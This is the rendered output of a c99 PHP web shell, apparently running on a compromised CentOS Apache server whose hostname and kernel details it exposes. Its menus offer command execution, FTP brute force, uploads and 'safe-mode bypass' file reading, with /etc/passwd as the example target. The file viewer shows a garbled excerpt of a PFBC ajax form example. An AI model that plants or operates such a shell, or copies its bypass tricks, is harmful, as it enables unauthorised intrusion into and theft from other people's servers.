!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/examples/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ajax.php (6.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |




PFBC provides several properties and methods for facilitating ajax submissions. To get started, you'll first need to set the ajax property in the form's configure method. The ajaxCallback property can also be included in the configure method if you'd like a javascript function to called after the form's data has been submitted. In the example below a callback function has been set to extract the latitude/longitude information from a json response.

The validation process for an ajax submission also differs slightly from that of a standard submission. If the form's isValid method returns false, you will need to invoke the renderAjaxErrorResponse method, which returns a json response containing the appropriate error messages. These errors will then be displayed in the form so the user can correct and resubmit.

configure(array( "prevent" => array("bootstrap", "jQuery"), "ajax" => 1, "ajaxCallback" => "parseJSONResponse" )); $form->addElement(new Element\Hidden("form", "ajax")); $form->addElement(new Element\HTML('Using the Google Geocoding API')); $form->addElement(new Element\Textbox("Address:", "Address", array( "required" => 1 ))); $form->addElement(new Element\HTML('')); $form->addElement(new Element\Button("Geocode", "submit", array( "icon" => "search" ))); $form->render(); ?>
configure(array( "prevent" => array("bootstrap", "jQuery"), "ajax" => 1, "ajaxCallback" => "parseJSONResponse", "novalidate" => "" )); $form->addElement(new Element\Hidden("form", "ajax")); $form->addElement(new Element\HTML(\'Using the Google Geocoding API\')); $form->addElement(new Element\Textbox("Address:", "Address", array( "required" => 1 ))); $form->addElement(new Element\HTML(\'\')); $form->addElement(new Element\Button("Geocode", "submit", array( "icon" => "search" ))); $form->render(); ?>
configure(array( "prevent" => array("bootstrap", "jQuery"), "ajax" => 1, "ajaxCallback" => "parseJSONResponse" )); $form->addElement(new Element_Hidden("form", "ajax")); $form->addElement(new Element_HTML(\'Using the Google Geocoding API\')); $form->addElement(new Element_Textbox("Address:", "Address", array( "required" => 1 ))); $form->addElement(new Element_HTML(\'\')); $form->addElement(new Element_Button("Geocode", "submit", array( "icon" => "search" ))); $form->render(); ?>
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--